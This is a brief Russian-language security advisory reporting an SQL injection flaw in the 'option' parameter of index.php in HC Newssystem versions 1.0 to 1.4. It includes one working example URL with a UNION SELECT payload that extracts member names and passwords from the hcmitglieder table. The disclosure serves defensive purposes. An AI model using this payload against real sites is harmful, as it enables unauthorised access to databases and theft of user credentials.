Программа: HC Newssystem 1.0-1.4

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «option» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

http://localhost/path/index.php?option=news&aktion=komm&ID=- 1/**/UNION/**/SELECT/**/null,null,mname,null,mpassword,null, null/**/FROM/**/hcmitglieder/**/WHERE/**/id=1/*



Оставить мнение